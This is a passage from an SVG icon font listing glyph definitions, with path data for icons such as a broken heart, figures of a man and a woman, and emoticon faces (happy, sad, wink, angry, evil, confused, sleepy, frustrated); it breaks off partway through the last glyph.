<glyph unicode="&#xee27;" glyph-name="heart-broken" d="M755.188 896c148.382 0 268.812-120.44 268.812-268.832 0-292.21-315.824-382.842-511.978-679.418-207.522 298.424-512.022 377.572-512.022 679.418 0 148.392 120.426 268.832 268.808 268.832 60.354 0 115.99-27.53 160.796-67.834l-77.604-124.166 224-128-128-320 352 384-224 128 61.896 92.846c35.42 21.768 75.21 35.154 117.292 35.154z" />
<glyph unicode="&#xee28;" glyph-name="man" d="M576 864c0-53.019-42.981-96-96-96s-96 42.981-96 96c0 53.019 42.981 96 96 96s96-42.981 96-96zM576 704h-192c-35.346 0-64-28.654-64-64v-320h64v-384h80v384h32v-384h80v384h64v320c0 35.346-28.652 64-64 64z" />
<glyph unicode="&#xee29;" glyph-name="woman" d="M576 864c0-53.019-42.981-96-96-96s-96 42.981-96 96c0 53.019 42.981 96 96 96s96-42.981 96-96zM719 448l49 35.5-133.286 206.116c-5.92 8.98-15.958 14.384-26.714 14.384h-256c-10.756 0-20.792-5.404-26.714-14.384l-133.286-206.116 49-35.5 110.644 143.596 38.458-89.74-134.102-245.856h122.666l21.334-320h64v320h32v-320h64l21.334 320h122.666l-134.104 245.858 38.458 89.74 110.646-143.598z" />
<glyph unicode="&#xee2a;" glyph-name="man-woman" d="M256 864c0-53.019-42.981-96-96-96s-96 42.981-96 96c0 53.019 42.981 96 96 96s96-42.981 96-96zM832 864c0-53.019-42.981-96-96-96s-96 42.981-96 96c0 53.019 42.981 96 96 96s96-42.981 96-96zM256 704h-192c-35.346 0-64-28.654-64-64v-320h64v-384h80v384h32v-384h80v384h64v320c0 35.346-28.652 64-64 64zM975 448l49 35.5-133.286 206.116c-5.92 8.98-15.958 14.384-26.714 14.384h-256c-10.756 0-20.792-5.404-26.714-14.384l-133.286-206.116 49-35.5 110.644 143.596 38.458-89.74-134.102-245.856h122.666l21.334-320h64v320h32v-320h64l21.334 320h122.666l-134.104 245.858 38.458 89.74 110.646-143.598z" />
<glyph unicode="&#xee2b;" glyph-name="happy" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM512 361.24c115.95 0 226.23 30.806 320 84.92-14.574-178.438-153.128-318.16-320-318.16-166.868 0-305.422 139.872-320 318.304 93.77-54.112 204.050-85.064 320-85.064zM256 608c0 53.019 28.654 96 64 96s64-42.981 64-96c0-53.019-28.654-96-64-96s-64 42.981-64 96zM640 608c0 53.019 28.654 96 64 96s64-42.981 64-96c0-53.019-28.654-96-64-96s-64 42.981-64 96z" />
<glyph unicode="&#xee2c;" glyph-name="happy2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM704 704c35.348 0 64-42.98 64-96s-28.652-96-64-96-64 42.98-64 96 28.652 96 64 96zM320 704c35.346 0 64-42.98 64-96s-28.654-96-64-96-64 42.98-64 96 28.654 96 64 96zM512 64c-166.868 0-305.422 139.872-320 318.304 93.77-54.114 204.050-85.064 320-85.064s226.23 30.806 320 84.92c-14.574-178.438-153.128-318.16-320-318.16z" />
<glyph unicode="&#xee2d;" glyph-name="smile" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM256 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM640 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM704.098 332.74l82.328-49.396c-55.962-93.070-157.916-155.344-274.426-155.344s-218.464 62.274-274.426 155.344l82.328 49.396c39.174-65.148 110.542-108.74 192.098-108.74s152.924 43.592 192.098 108.74z" />
<glyph unicode="&#xee2e;" glyph-name="smile2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM704 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64 28.654 64 64 64zM320 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64 28.654 64 64 64zM512 128c-116.51 0-218.464 62.274-274.426 155.344l82.328 49.396c39.174-65.148 110.542-108.74 192.098-108.74s152.924 43.592 192.098 108.74l82.328-49.396c-55.962-93.070-157.916-155.344-274.426-155.344z" />
<glyph unicode="&#xee2f;" glyph-name="tongue" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM256 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM640 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM768 384v-64h-64v-96c0-53.020-42.98-96-96-96s-96 42.98-96 96v96h-256v64h512z" />
<glyph unicode="&#xee30;" glyph-name="tongue2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM320 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64 28.654 64 64 64zM768 320h-64v-96c0-53.020-42.98-96-96-96s-96 42.98-96 96v96h-256v64h512v-64zM704 576c-35.346 0-64 28.654-64 64s28.654 64 64 64 64-28.654 64-64-28.654-64-64-64z" />
<glyph unicode="&#xee31;" glyph-name="sad" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM256 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM640 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM319.902 179.26l-82.328 49.396c55.962 93.070 157.916 155.344 274.426 155.344 116.508 0 218.462-62.274 274.426-155.344l-82.328-49.396c-39.174 65.148-110.542 108.74-192.098 108.74-81.558 0-152.924-43.592-192.098-108.74z" />
<glyph unicode="&#xee32;" glyph-name="sad2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM704 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64 28.654 64 64 64zM320 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64 28.654 64 64 64zM704.098 179.26c-39.174 65.148-110.544 108.74-192.098 108.74-81.556 0-152.924-43.592-192.098-108.74l-82.328 49.396c55.96 93.070 157.916 155.344 274.426 155.344 116.508 0 218.464-62.274 274.426-155.344l-82.328-49.396z" />
<glyph unicode="&#xee33;" glyph-name="wink" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM542.74 248.972c140.248 27.706 249.11 91.542 288.454 176.594-21.654-167.956-161.518-297.566-330.85-297.566-119.242 0-223.858 64.282-282.892 160.948 70.41-55.058 194.534-65.808 325.288-39.976zM640 608c0 53.019 28.654 96 64 96s64-42.981 64-96c0-53.019-28.654-96-64-96s-64 42.981-64 96zM352 588.5c-41.796 0-77.334-15.656-90.516-37.5-3.54 5.866-5.484 32.174-5.484 38.75 0 31.066 42.98 56.25 96 56.25s96-25.184 96-56.25c0-6.576-1.944-32.884-5.484-38.75-13.182 21.844-48.72 37.5-90.516 37.5z" />
<glyph unicode="&#xee34;" glyph-name="wink2" d="M512 960c-282.77 0-512-229.228-512-512 0-282.77 229.228-512 512-512 282.77 0 512 229.23 512 512 0 282.772-229.23 512-512 512zM704 704c35.346 0 64-42.98 64-96s-28.654-96-64-96-64 42.98-64 96 28.654 96 64 96zM352 647.938c59.646 0 102-22.332 102-57.282 0-7.398 3.812-42.994-0.17-49.594-14.828 24.576-54.81 42.188-101.83 42.188s-87.002-17.612-101.83-42.188c-3.982 6.6-0.17 42.196-0.17 49.594 0 34.95 42.354 57.282 102 57.282zM500.344 128c-119.242 0-223.858 64.28-282.892 160.952 70.41-55.060 194.534-65.81 325.288-39.978 140.248 27.706 249.11 91.542 288.454 176.594-21.654-167.96-161.518-297.568-330.85-297.568z" />
<glyph unicode="&#xee35;" glyph-name="grin" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM192 448v-64c0-140.8 115.2-256 256-256h128c140.8 0 256 115.2 256 256v64h-640zM384 203.012c-26.538 9.458-50.924 24.822-71.544 45.446-36.406 36.402-56.456 84.54-56.456 135.542h128v-180.988zM576 192h-128v192h128v-192zM711.544 248.458c-20.624-20.624-45.010-35.988-71.544-45.446v180.988h128c0-51.002-20.048-99.14-56.456-135.542zM225.352 576c0.002 0 0 0 0 0 9.768 0 18.108 7.056 19.724 16.69 6.158 36.684 37.668 63.31 74.924 63.31s68.766-26.626 74.924-63.31c1.616-9.632 9.956-16.69 19.722-16.69 9.768 0 18.108 7.056 19.724 16.688 1.082 6.436 1.628 12.934 1.628 19.312 0 63.962-52.038 116-116 116s-116-52.038-116-116c0-6.378 0.548-12.876 1.628-19.312 1.62-9.632 9.96-16.688 19.726-16.688zM609.352 576c0.002 0 0 0 0 0 9.77 0 18.112 7.056 19.724 16.69 6.158 36.684 37.668 63.31 74.924 63.31s68.766-26.626 74.924-63.31c1.616-9.632 9.958-16.69 19.722-16.69s18.108 7.056 19.722 16.688c1.082 6.436 1.628 12.934 1.628 19.312 0 63.962-52.038 116-116 116s-116-52.038-116-116c0-6.378 0.544-12.876 1.626-19.312 1.624-9.632 9.964-16.688 19.73-16.688z" />
<glyph unicode="&#xee36;" glyph-name="grin2" d="M512 960c-282.77 0-512-229.23-512-512s229.226-512 512-512c282.77 0 512 229.23 512 512s-229.23 512-512 512zM704 724c63.962 0 116-52.038 116-116 0-6.378-0.546-12.876-1.628-19.312-1.618-9.632-9.958-16.688-19.724-16.688s-18.108 7.056-19.722 16.69c-6.16 36.684-37.67 53.31-74.926 53.31s-68.766-16.626-74.924-53.31c-1.616-9.632-9.956-16.69-19.722-16.69-0.002 0 0 0-0.002 0-9.766 0-18.106 7.056-19.722 16.688-1.084 6.436-1.63 12.934-1.63 19.312 0 63.962 52.038 116 116 116zM320 724c63.962 0 116-52.038 116-116 0-6.378-0.548-12.876-1.628-19.312-1.618-9.632-9.956-16.688-19.724-16.688s-18.106 7.056-19.722 16.69c-6.16 36.684-37.67 53.31-74.926 53.31s-68.766-16.626-74.924-53.31c-1.616-9.632-9.956-16.69-19.722-16.69 0 0 0 0 0 0-9.766 0-18.106 7.056-19.724 16.688-1.082 6.436-1.63 12.934-1.63 19.312 0 63.962 52.038 116 116 116zM192 384h192v-247.846c-110.094 28.606-192 129.124-192 247.846zM448 128v256h128v-256h-128zM640 136.154v247.846h192c0-118.722-81.904-219.24-192-247.846z" />
<glyph unicode="&#xee37;" glyph-name="cool" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM800 704c17.6 0 32-14.4 32-32v-96c0-35.2-28.8-64-64-64h-128c-35.2 0-64 28.8-64 64h-128c0-35.2-28.8-64-64-64h-128c-35.2 0-64 28.8-64 64v96c0 17.6 14.4 32 32 32h192c17.6 0 32-14.4 32-32v-32h128v32c0 17.6 14.4 32 32 32h192zM512 192c93.208 0 174.772 49.818 219.546 124.278l54.88-32.934c-55.966-93.070-157.916-155.344-274.426-155.344-48.458 0-94.384 10.796-135.54 30.082l33.162 55.278c31.354-13.714 65.964-21.36 102.378-21.36z" />
<glyph unicode="&#xee38;" glyph-name="cool2" d="M512 960c-282.77 0-512-229.23-512-512s229.226-512 512-512c282.77 0 512 229.23 512 512s-229.23 512-512 512zM512 128c-48.458 0-94.384 10.796-135.542 30.082l33.162 55.276c31.356-13.712 65.966-21.358 102.38-21.358 93.208 0 174.772 49.818 219.542 124.278l54.882-32.934c-55.964-93.070-157.914-155.344-274.424-155.344zM832 576c0-35.2-28.8-64-64-64h-128c-35.2 0-64 28.8-64 64h-128c0-35.2-28.8-64-64-64h-128c-35.2 0-64 28.8-64 64v96c0 17.6 14.4 32 32 32h192c17.6 0 32-14.4 32-32v-32h128v32c0 17.6 14.4 32 32 32h192c17.6 0 32-14.4 32-32v-96z" />
<glyph unicode="&#xee39;" glyph-name="angry" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM704.098 179.26c-39.174 65.148-110.544 108.74-192.098 108.74-81.556 0-152.924-43.592-192.098-108.74l-82.328 49.396c55.96 93.070 157.916 155.344 274.426 155.344 116.508 0 218.464-62.274 274.426-155.344l-82.328-49.396zM767.042 679.76c4.284-17.144-6.14-34.518-23.282-38.804-17.626-4.45-38.522-12.12-56.936-21.35 10.648-11.43 17.174-26.752 17.174-43.606 0-35.346-28.654-64-64-64s-64 28.654-64 64c0 1.17 0.036 2.33 0.098 3.484 2.032 47.454 45.212 78.946 81.592 97.138 34.742 17.37 69.102 26.060 70.548 26.422 17.146 4.288 34.518-6.138 38.806-23.284zM256.958 679.76c4.288 17.146 21.66 27.572 38.806 23.284 1.446-0.362 35.806-9.052 70.548-26.422 36.38-18.192 79.56-49.684 81.592-97.138 0.062-1.154 0.098-2.314 0.098-3.484 0-35.346-28.654-64-64-64s-64 28.654-64 64c0 16.854 6.526 32.176 17.174 43.606-18.414 9.23-39.31 16.9-56.936 21.35-17.142 4.286-27.566 21.66-23.282 38.804z" />
<glyph unicode="&#xee3a;" glyph-name="angry2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM576.094 579.484c2.032 47.454 45.21 78.948 81.592 97.138 34.742 17.372 69.104 26.060 70.548 26.422 17.146 4.288 34.52-6.138 38.806-23.284s-6.138-34.518-23.284-38.806c-17.624-4.45-38.522-12.12-56.936-21.35 10.648-11.43 17.174-26.752 17.174-43.606 0-35.346-28.654-64-64-64s-64 28.654-64 64c0.002 1.17 0.038 2.332 0.1 3.486zM256.958 679.76c4.288 17.146 21.66 27.572 38.806 23.284 1.446-0.362 35.806-9.052 70.548-26.422 36.38-18.192 79.56-49.684 81.592-97.138 0.062-1.154 0.098-2.314 0.098-3.484 0-35.346-28.654-64-64-64s-64 28.654-64 64c0 16.854 6.526 32.176 17.174 43.606-18.414 9.23-39.31 16.9-56.936 21.35-17.142 4.286-27.566 21.66-23.282 38.804zM704.098 179.26c-39.174 65.148-110.544 108.74-192.098 108.74-81.556 0-152.924-43.592-192.098-108.74l-82.328 49.396c55.96 93.070 157.916 155.344 274.426 155.344 116.508 0 218.464-62.274 274.426-155.344l-82.328-49.396z" />
<glyph unicode="&#xee3b;" glyph-name="evil" d="M639.996 512c-35.346 0-64 28.654-63.998 64.002 0 1.17 0.036 2.33 0.098 3.484 2.032 47.454 45.212 78.946 81.592 97.138 34.742 17.37 69.102 26.060 70.548 26.422 17.146 4.288 34.518-6.138 38.806-23.284 4.284-17.146-6.14-34.518-23.284-38.806-17.626-4.45-38.522-12.12-56.936-21.35 10.648-11.43 17.174-26.752 17.174-43.606 0-35.346-28.654-64-64-64zM280.242 640.956c-17.144 4.286-27.568 21.66-23.282 38.804 4.286 17.146 21.66 27.572 38.806 23.284 1.444-0.362 35.806-9.050 70.548-26.422 36.382-18.19 79.56-49.684 81.592-97.138 0.062-1.154 0.098-2.316 0.098-3.484 0-35.346-28.654-64-64-64s-64 28.654-64 64c0 16.854 6.526 32.176 17.174 43.606-18.414 9.23-39.312 16.9-56.936 21.35zM512 224c81.554 0 152.924 43.592 192.098 108.74l82.328-49.396c-55.962-93.070-157.916-155.344-274.426-155.344s-218.464 62.274-274.426 155.344l82.328 49.396c39.174-65.148 110.542-108.74 192.098-108.74zM1024 896c0 45.516-9.524 88.8-26.652 128-33.576-76.836-96.448-137.932-174.494-169.178-86.194 65.96-193.936 105.178-310.854 105.178s-224.66-39.218-310.854-105.178c-78.048 31.246-140.918 92.342-174.494 169.178-17.128-39.2-26.652-82.484-26.652-128 0-73.574 24.85-141.328 66.588-195.378-42.37-74.542-66.588-160.75-66.588-252.622 0-282.77 229.23-512 512-512s512 229.23 512 512c0 91.872-24.218 178.080-66.588 252.622 41.738 54.050 66.588 121.804 66.588 195.378zM512 32c-229.75 0-416 186.25-416 416s186.25 416 416 416 416-186.25 416-416-186.25-416-416-416z" />
<glyph unicode="&#xee3c;" glyph-name="evil2" d="M1024 896c0 45.516-9.524 88.8-26.652 128-33.576-76.836-96.448-137.932-174.494-169.178-86.194 65.96-193.936 105.178-310.854 105.178s-224.66-39.218-310.854-105.178c-78.048 31.246-140.918 92.342-174.494 169.178-17.128-39.2-26.652-82.484-26.652-128 0-73.574 24.85-141.328 66.588-195.378-42.37-74.542-66.588-160.75-66.588-252.622 0-282.77 229.23-512 512-512s512 229.23 512 512c0 91.872-24.218 178.080-66.588 252.622 41.738 54.050 66.588 121.804 66.588 195.378zM576.094 579.484c2.032 47.454 45.21 78.948 81.592 97.138 34.742 17.372 69.104 26.060 70.548 26.422 17.146 4.288 34.52-6.138 38.806-23.284s-6.138-34.518-23.284-38.806c-17.624-4.45-38.522-12.12-56.936-21.35 10.648-11.43 17.174-26.752 17.174-43.606 0-35.346-28.654-64-64-64s-64 28.654-64 64c0.002 1.17 0.038 2.332 0.1 3.486zM256.958 679.76c4.288 17.146 21.66 27.572 38.806 23.284 1.446-0.362 35.806-9.052 70.548-26.422 36.38-18.192 79.56-49.684 81.592-97.138 0.062-1.154 0.098-2.314 0.098-3.484 0-35.346-28.654-64-64-64s-64 28.654-64 64c0 16.854 6.526 32.176 17.174 43.606-18.414 9.23-39.31 16.9-56.936 21.35-17.142 4.286-27.566 21.66-23.282 38.804zM512 128c-116.51 0-218.464 62.274-274.426 155.344l82.328 49.396c39.174-65.148 110.542-108.74 192.098-108.74 81.554 0 152.924 43.592 192.098 108.74l82.328-49.396c-55.962-93.070-157.916-155.344-274.426-155.344z" />
<glyph unicode="&#xee3d;" glyph-name="shocked" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM384 256c0 70.692 57.308 128 128 128s128-57.308 128-128c0-70.692-57.308-128-128-128s-128 57.308-128 128zM640 608c0 53.019 28.654 96 64 96s64-42.981 64-96c0-53.019-28.654-96-64-96s-64 42.981-64 96zM256 608c0 53.019 28.654 96 64 96s64-42.981 64-96c0-53.019-28.654-96-64-96s-64 42.981-64 96z" />
<glyph unicode="&#xee3e;" glyph-name="shocked2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM320 512c-35.346 0-64 42.98-64 96s28.654 96 64 96 64-42.98 64-96-28.654-96-64-96zM512 128c-70.692 0-128 57.308-128 128s57.308 128 128 128c70.692 0 128-57.308 128-128s-57.308-128-128-128zM704 512c-35.346 0-64 42.98-64 96s28.654 96 64 96 64-42.98 64-96-28.654-96-64-96z" />
<glyph unicode="&#xee3f;" glyph-name="baffled" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM384 544c0-17.673-14.327-32-32-32s-32 14.327-32 32c0 17.673 14.327 32 32 32s32-14.327 32-32zM352 640c53.020 0 96-42.98 96-96s-42.98-96-96-96-96 42.98-96 96 42.98 96 96 96zM352 704c-88.224 0-160-71.776-160-160s71.776-160 160-160 160 71.776 160 160-71.776 160-160 160v0zM704 544c0-17.673-14.327-32-32-32s-32 14.327-32 32c0 17.673 14.327 32 32 32s32-14.327 32-32zM672 640c53.020 0 96-42.98 96-96s-42.98-96-96-96-96 42.98-96 96 42.98 96 96 96zM672 704c-88.224 0-160-71.776-160-160s71.776-160 160-160 160 71.776 160 160-71.776 160-160 160v0zM384 256h256v-64h-256v64z" />
<glyph unicode="&#xee40;" glyph-name="baffled2" d="M384 544c0-17.674-14.326-32-32-32s-32 14.326-32 32 14.326 32 32 32 32-14.326 32-32zM704 544c0-17.674-14.326-32-32-32s-32 14.326-32 32 14.326 32 32 32 32-14.326 32-32zM512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM256 544c0 53.020 42.98 96 96 96s96-42.98 96-96-42.98-96-96-96-96 42.98-96 96zM640 192h-256v64h256v-64zM672 448c-53.020 0-96 42.98-96 96s42.98 96 96 96 96-42.98 96-96-42.98-96-96-96z" />
<glyph unicode="&#xee41;" glyph-name="confused" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM256 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM640 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM726.106 320h64.864c9.246-72.506-32.452-144.53-103.958-170.56-82.904-30.176-174.9 12.716-205.080 95.616-18.108 49.744-73.306 75.482-123.048 57.372-45.562-16.588-70.956-64.298-60.988-110.424h-64.86c-9.242 72.508 32.45 144.528 103.956 170.56 82.904 30.178 174.902-12.716 205.082-95.614 18.104-49.748 73.306-75.482 123.044-57.372 45.562 16.584 70.956 64.298 60.988 110.422z" />
<glyph unicode="&#xee42;" glyph-name="confused2" d="M512 960c-282.77 0-512-229.23-512-512s229.226-512 512-512c282.77 0 512 229.23 512 512s-229.23 512-512 512zM704 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64c0 35.346 28.654 64 64 64zM320 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64c0 35.346 28.654 64 64 64zM687.010 149.44c-82.902-30.18-174.9 12.712-205.080 95.614-18.108 49.742-73.306 75.478-123.048 57.372-45.562-16.588-70.958-64.296-60.988-110.424h-64.86c-9.244 72.508 32.45 144.532 103.956 170.56 82.904 30.18 174.902-12.712 205.082-95.614 18.108-49.742 73.306-75.476 123.046-57.37 45.562 16.584 70.958 64.294 60.988 110.422h64.864c9.24-72.506-32.454-144.532-103.96-170.56z" />
<glyph unicode="&#xee43;" glyph-name="neutral" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM256 640c0-35.346 28.654-64 64-64s64 28.654 64 64-28.654 64-64 64-64-28.654-64-64zM640 640c0-35.346 28.654-64 64-64s64 28.654 64 64-28.654 64-64 64-64-28.654-64-64zM384 256h256v-64h-256v64z" />
<glyph unicode="&#xee44;" glyph-name="neutral2" d="M512 960c-282.77 0-512-229.23-512-512s229.226-512 512-512c282.77 0 512 229.23 512 512s-229.23 512-512 512zM640 192h-256v64h256v-64zM704 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64c0 35.346 28.654 64 64 64zM320 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64c0 35.346 28.654 64 64 64z" />
<glyph unicode="&#xee45;" glyph-name="hipster" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM256 640c0 35.346 28.654 64 64 64s64-28.654 64-64-28.654-64-64-64-64 28.654-64 64zM640 640c0 35.346 28.654 64 64 64s64-28.654 64-64-28.654-64-64-64-64 28.654-64 64zM675.882 419.882c-37.49 37.49-98.276 37.49-135.766 0s-37.49-98.276 0-135.766c1.204-1.204 2.434-2.368 3.684-3.492 86.528-78.512 288.2 1.842 288.2 103.376-62-40-110.45-9.786-156.118 35.882zM348.118 419.882c37.49 37.49 98.276 37.49 135.766 0s37.49-98.276 0-135.766c-1.204-1.204-2.434-2.368-3.684-3.492-86.528-78.512-288.2 1.842-288.2 103.376 62-40 110.45-9.786 156.118 35.882z" />
<glyph unicode="&#xee46;" glyph-name="hipster2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM704 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64 28.654 64 64 64zM320 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64 28.654 64 64 64zM543.8 280.624c-1.25 1.124-2.48 2.29-3.684 3.492-18.74 18.74-28.112 43.3-28.118 67.864-0.004-24.562-9.376-49.124-28.118-67.864-1.204-1.204-2.434-2.368-3.684-3.492-86.524-78.512-288.196 1.842-288.196 103.376 62-40 110.45-9.786 156.118 35.882 37.49 37.49 98.276 37.49 135.766 0 18.74-18.74 28.112-43.3 28.118-67.864 0.004 24.562 9.376 49.124 28.118 67.864 37.49 37.49 98.276 37.49 135.766 0 45.664-45.668 94.114-75.882 156.114-35.882 0-101.534-201.672-181.888-288.2-103.376z" />
<glyph unicode="&#xee47;" glyph-name="wondering" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM745.74 358.38l22.488-76.776-437.008-128.002-22.488 76.776zM256 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM640 640c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64z" />
<glyph unicode="&#xee48;" glyph-name="wondering2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM704 704c35.346 0 64-28.654 64-64s-28.654-64-64-64-64 28.654-64 64 28.654 64 64 64zM256 640c0 35.346 28.654 64 64 64s64-28.654 64-64-28.654-64-64-64-64 28.654-64 64zM331.244 153.614l-22.488 76.774 437 128 22.488-76.774-437-128z" />
<glyph unicode="&#xee49;" glyph-name="sleepy" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM640 288c0-88.366-57.308-160-128.002-160s-128.002 71.634-128.002 160c0 88.366 57.308 160 128.002 160s128.002-71.634 128.002-160zM416 620c-8.19 0-16.378 3.124-22.626 9.374-19.334 19.332-63.412 19.332-82.746 0-12.496-12.498-32.758-12.498-45.254 0-12.498 12.496-12.498 32.758 0 45.254 44.528 44.53 128.726 44.53 173.254 0 12.498-12.496 12.498-32.758 0-45.254-6.248-6.25-14.438-9.374-22.628-9.374zM736 620c-8.19 0-16.378 3.124-22.626 9.374-19.332 19.332-63.414 19.332-82.746 0-12.496-12.498-32.758-12.498-45.254 0-12.498 12.496-12.498 32.758 0 45.254 44.528 44.53 128.726 44.53 173.254 0 12.498-12.496 12.498-32.758 0-45.254-6.248-6.25-14.438-9.374-22.628-9.374z" />
<glyph unicode="&#xee4a;" glyph-name="sleepy2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM310.628 629.374c-12.496-12.498-32.758-12.498-45.254 0-12.498 12.496-12.498 32.758 0 45.254 44.528 44.53 128.726 44.53 173.254 0 12.498-12.496 12.498-32.758 0-45.254-6.248-6.25-14.438-9.374-22.628-9.374s-16.378 3.124-22.626 9.374c-19.334 19.332-63.412 19.332-82.746 0zM511.998 128c-70.694 0-128.002 71.634-128.002 160s57.308 160 128.002 160 128.002-71.634 128.002-160-57.308-160-128.002-160zM758.628 629.374c-6.248-6.25-14.438-9.374-22.628-9.374s-16.378 3.124-22.626 9.374c-19.332 19.332-63.414 19.332-82.746 0-12.496-12.498-32.758-12.498-45.254 0-12.498 12.496-12.498 32.758 0 45.254 44.528 44.53 128.726 44.53 173.254 0 12.498-12.498 12.498-32.758 0-45.254z" />
<glyph unicode="&#xee4b;" glyph-name="frustrated" d="M366.312 676.622c-34.742 17.37-69.102 26.060-70.548 26.422-17.146 4.288-34.518-6.138-38.806-23.284-4.284-17.144 6.14-34.518 23.282-38.804 17.626-4.45 38.522-12.12 56.936-21.35-10.648-11.43-17.174-26.752-17.174-43.606 0-35.346 28.654-64 64-64s64 28.654 64 64c0 1.17-0.036 2.33-0.098 3.484-2.032 47.454-45.212 78.946-81.592 97.138zM512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM236.498 136.336c10.706-5.324 22.756-8.336 35.502-8.336h480c12.746 0 24.796 3.012 35.502 8.338-73.378-64.914-169.828-104.338-275.502-104.338-105.672 0-202.124 39.424-275.502 104.336zM256 208v96c0 8.674 7.328 16 16 16h112v-128h-112c-8.672 0-16 7.326-16 16zM448 192v128h128v-128h-128zM640 192v128h112c8.674 0 16-7.326 16-16v-96c0-8.674-7.326-16-16-16h-112zM823.662 